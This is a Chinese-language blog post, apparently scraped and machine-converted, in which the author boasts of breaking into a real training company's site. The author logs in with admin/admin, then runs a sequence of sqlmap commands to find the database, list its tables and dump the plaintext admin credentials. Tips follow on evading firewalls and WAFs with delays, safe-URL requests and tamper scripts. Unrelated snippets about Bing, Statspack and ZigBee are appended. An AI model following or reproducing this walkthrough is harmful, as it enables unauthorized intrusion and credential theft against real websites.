【sqlmap】sql注入之初體驗
乙個管理培訓**,後台管理系統後面加個/admin就是,這麼容易就找到了後台管理,果然容易黑。後台:
不過,後台管理ui有點醜。
然後輸入使用者名稱/密碼:admin/admin,就進去了。如下:
怎麼搞de呢,首先我們使用一些掃瞄工具
掃瞄可sql注入的站點(搜尋關鍵字一般都是inurl:.php?這類)。記下你要攻擊的站點,然後使用sqlmap:
sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch //*表示由sqlmap自動掃瞄注入點 --batch表示由sqlmap預設選擇提示。如下:
可以看到:這**使用mysql5.5以上版本,且存在布林注入、報錯注入、基於時間延遲注入和聯合查詢注入。神啊,天殺的程式設計師,**寫得賊jb6啊。
一步一步來,使用sqlmap:
[你的站點網域名稱]/about.php?id=1*" --batch --current-db //檢視當前使用的資料庫
資料庫:sailodln_main,記住了。繼續來:
[你的站點網域名稱]
/about.php?id=1*" --batch -d sailodln_main --tables //檢視當前資料庫的所有表
一般管理員使用者名稱密碼可能在有admin字樣的表中吧。
[你的站點網域名稱]/about.php?id=1*" --batch -d sailodln_main -t v_admin --columns //檢視v_admin表的所有字段
把這兩個欄位的內容dump出excel:
[你的站點網域名稱]/about.php?id=1*" --batch -d sailodln_main -t v_admin -c name,pwd --dump
ok,拿到管理員賬戶和密碼,而且居然也還是明文儲存的,這程式設計師可以拿來祭天了吧,應該。
接下裡,人道主義:
最後,說說關於sqlmap,我的一些總結:
1.使用**(一般使用藍燈**80-瀏覽器訪問,高階設定裡可看到本地**位址,並勾選**全部流量):
2.忽略https:
--force-ssl
3.使用多執行緒加快速度:
--threads=0~10
4.偽靜態頁面
有些web伺服器進行了url rewrite或者**是偽靜態的(*.html),無法直接提供測試引數,這樣子可以使用
*來代替要測試的引數。
5.請求延時
在注入過程中請求太頻繁的話可能會被防火牆攔截,這時候
--delay引數就起作用了。可以設定兩次http請求間的延時。有的web程式會在多次錯誤訪問後遮蔽所有請求,這樣就導致之後所有的測試無法進行,繞過這個策略可以使用
--safe-url,每隔一段時間去訪問乙個正常的頁面。
6.使用google搜尋
sqlmap可以測試google搜尋結果中的sql注入,很強大的功能吧。使用方法是引數
-g。不過感覺實際使用中這個用的還是很少的。
7.post注入
有兩種方法來進行post注入,一種是使用
--data引數,將post的key和value用類似get方式來提交。二是使用
-r引數,sqlmap讀取使用者抓到的post請求包,來進行post注入檢測。
8.檢視payload
使用-v 3就可以顯示注入的payload,4,5,6還可以顯示http請求,http響應頭和頁面。
9.tamper
如"space2morehash.py" ,呼叫指令碼對payload進行偽裝,可用於防止waf等攔截。
注:基於時間延時的注入使用多執行緒也沒用,並且獲取很慢
重啟電腦後,未完成的sessionsqlite將清除
**和執行緒一般是互斥的,乙個**一般允許乙個執行緒作為使用者去訪問它,如藍燈。
bing之初體驗
哈哈,期待已久的微軟搜尋引擎bing 必應 的中文版今天終於推出了。剛開始使用google搜尋其主頁時怎麼也搜尋不到,還以為微軟食言。後來轉念一想,bing很可能是google未來的最大競爭對手,在當前這個還不為人所熟知的階段,很有可能給對方穿穿小鞋的。於是用在ie自帶的搜尋工具條上鍵入bing之後...
Statspack之初體驗
呵呵,今晚之前從來沒有做過statspack 好像有點丟人 這幾天乙個資料庫實在被折磨得不行了,明明sga max size有1.5g,但是實際看整個例項才用了200 m記憶體,慢得要死,頻繁讀寫硬碟,偏偏硬碟又不是磁碟陣列,io狂慢,唉,痛苦啊。於是決定花點時間學下例項優化,今天列印了幾頁perf...
ZigBee之初體驗
古人說 工欲善其事,必先利其器 簡單看懂原理圖還是有必要的,雖然自己幾乎沒有硬體基礎,短時期畫所謂的版子不具現實意義。晶元原理圖自從有人說u是晶元標誌,p是埠,c是電容,r是電阻,s是按鍵,led是led燈。後才漸漸明白 引腳標記相同的,學長說表示版子內部已連線,至於露在外面的引腳他們說是用來跳線用...